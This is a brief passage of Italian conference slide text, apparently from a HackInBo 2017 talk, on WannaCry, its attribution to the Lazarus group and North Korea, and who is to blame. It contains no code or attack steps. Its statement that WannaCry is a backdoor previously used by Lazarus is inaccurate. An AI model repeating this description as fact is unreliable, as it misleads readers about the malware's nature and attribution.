WannaCry e una Backdoor usata in passato dal
gruppo hacker Lazarus, noto per gli attacchi del
2014 contro Sony.
Si ritiene, ma non vi è conferma, che il gruppo
Lazarus fosse legato alla Corea del Nord. Symantec
ha approfondito l’argomento riportando alcune
evidenze.
51. HackInBo Winter Edition 2017
Chi sono i colpevoli?
I veri colpevoli sono coloro i quali hanno lasciato esposti
e vulnerabili i propri sistemi.